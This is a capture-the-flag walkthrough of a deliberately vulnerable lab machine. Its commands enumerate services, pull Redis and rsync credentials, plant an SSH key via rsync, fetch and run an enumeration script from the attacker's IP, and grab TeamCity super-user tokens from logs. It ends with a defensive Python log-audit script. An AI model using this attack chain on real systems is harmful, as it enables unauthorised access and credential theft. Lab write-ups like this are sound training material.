nmap
nmap -p- -T5 -sV -vvv 10.10.210.193
Output:
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
111/tcp open rpcbind syn-ack 2-4 (RPC #100000)
139/tcp open netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
873/tcp open rsync syn-ack (protocol version 31)
2049/tcp open nfs_acl syn-ack 3 (RPC #100227)
6379/tcp open redis syn-ack Redis key-value store
9090/tcp filtered zeus-admin no-response
44305/tcp open nlockmgr syn-ack 1-4 (RPC #100021)
50597/tcp open mountd syn-ack 1-3 (RPC #100005)
55125/tcp open mountd syn-ack 1-3 (RPC #100005)
58261/tcp open mountd syn-ack 1-3 (RPC #100005)
Service Info: Host: VULNNET-INTERNAL; OS: Linux; CPE: cpe:/o:linux:linux_kernel
SMB
smbclient //10.10.210.193/shares -U "guest"
NFS
sudo pacman -S nfs-utils
sudo mount -t nfs 10.10.210.193:/opt/conf /home/peanutstick/Documents/CTF/THM/vulnet_internal/mount
The config files are interesting: among them is the Redis configuration.
Let's grab the password from it.
B65Hx562F@ggAZ@F
Redis
https://book.hacktricks.xyz/network-services-pentesting/6379-pentesting-redis
nc -vn 10.10.210.193 6379
AUTH B65Hx562F@ggAZ@F
SELECT 0
KEYS *
GET "internal flag"
Get "authlist":
LRANGE "authlist" 0 -1
Decode the base64-encoded value:
echo QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg== | base64 -d
Output:
Authorization for rsync://rsync-connect@127.0.0.1 with password Hcg3HP67@TW@Bc72v
Rsync
List the files:
rsync -av --list-only rsync://10.10.210.193
Copy the files:
rsync -av rsync://rsync-connect@10.10.210.193/files ./files
We have the flag; note that tree doesn't list the hidden (dot) files.
https://medium.com/r3d-buck3t/attack-insecure-rsync-service-928951af34ed
There is a .ssh directory, so we can upload an authorized_keys file to connect via SSH.
ssh-keygen -t rsa -f A_rsa
Then upload the public key as authorized_keys:
rsync authorized_keys rsync://rsync-connect@10.10.210.193/files/sys-internal/.ssh
Connect via SSH with the private key:
ssh -i A_rsa sys-internal@10.10.210.193
SSH
lse.sh
Then download and run it on the target:
wget http://10.8.50.167:8000/lse.sh
chmod +x lse.sh
./lse.sh
yeah but I don't have my password
8111
Port forwarding
https://hideandsec.sh/books/cheatsheets-82c/page/pivoting
ss -tlnp
Port 8111 is listening on localhost, so forward it to the attacking machine with a local port forward:
ssh -i A_rsa sys-internal@10.10.210.193 -L 8111:127.0.0.1:8111 -N
http://127.0.0.1:8111/login.html
Click on "as a Super user", then find the token in the logs:
cd /TeamCity/logs
grep -rnwi --color=always "token" . 2>/dev/null
Output:
./catalina.out:56:[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
./catalina.out:57:[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
./catalina.out:1402:[TeamCity] Super user authentication token: 3782562599667957776 (use empty username with the token as the password to access the server)
./catalina.out:1457:[TeamCity] Super user authentication token: 5812627377764625872 (use empty username with the token as the password to access the server)
./catalina.out:1526:[TeamCity] Super user authentication token: 6152940187709854289 (use empty username with the token as the password to access the server)
./catalina.out:1583:[TeamCity] Super user authentication token: 6152940187709854289 (use empty username with the token as the password to access the server)
Once the command is in the build step, start the listener, then click Run.
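As an added example (not part of the original writeup), a small Python audit that does what the grep above does in a reusable way: it scans TeamCity's catalina.out for the "Super user authentication token" lines, reports each occurrence with the token redacted, counts how many distinct tokens have been logged, and checks whether the log's permissions let users other than the owner read it, which is the condition that made the token recoverable here. The sample log lines and tokens are constructed; the log path is an assumption.

```python
import os
import re
import stat
from typing import List, Tuple

# Pattern modelled on the catalina.out message shown above; the token is a run of digits.
TOKEN_RE = re.compile(r"Super user authentication token: (\d+)")


def find_super_user_tokens(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line_number, redacted_token) for every token line.

    Only the last 4 digits are kept so a report can be shared without
    re-exposing the secret it is warning about.
    """
    hits = []
    for lineno, line in enumerate(lines, start=1):
        m = TOKEN_RE.search(line)
        if m:
            token = m.group(1)
            hits.append((lineno, "*" * (len(token) - 4) + token[-4:]))
    return hits


def distinct_token_count(lines: List[str]) -> int:
    """Each TeamCity restart logs a fresh token; count how many distinct ones are exposed."""
    return len({m.group(1) for line in lines if (m := TOKEN_RE.search(line))})


def mode_readable_by_others(mode: int) -> bool:
    """True if the group or world read bit is set (e.g. 0o644)."""
    return bool(mode & (stat.S_IRGRP | stat.S_IROTH))


def log_readable_by_others(path: str) -> bool:
    """Check the on-disk permissions of a log file."""
    return mode_readable_by_others(os.stat(path).st_mode)


# Constructed sample in the format of the catalina.out lines above (tokens are made up,
# same 19-digit length as real ones).
TOKEN_A = "1" * 19
TOKEN_B = "2" * 19
SUFFIX = "(use empty username with the token as the password to access the server)"
SAMPLE_LOG = [
    "[TeamCity] Server started",
    f"[TeamCity] Super user authentication token: {TOKEN_A} {SUFFIX}",
    f"[TeamCity] Super user authentication token: {TOKEN_A} {SUFFIX}",
    "[TeamCity] Build queue empty",
    f"[TeamCity] Super user authentication token: {TOKEN_B} {SUFFIX}",
]

if __name__ == "__main__":
    for lineno, redacted in find_super_user_tokens(SAMPLE_LOG):
        print(f"line {lineno}: super user token exposed ({redacted})")
    print(f"{distinct_token_count(SAMPLE_LOG)} distinct token(s) in log")
    LOG_PATH = "/TeamCity/logs/catalina.out"  # assumed path, as used in the writeup
    if os.path.exists(LOG_PATH) and log_readable_by_others(LOG_PATH):
        print(f"{LOG_PATH} is readable by non-owner users")
```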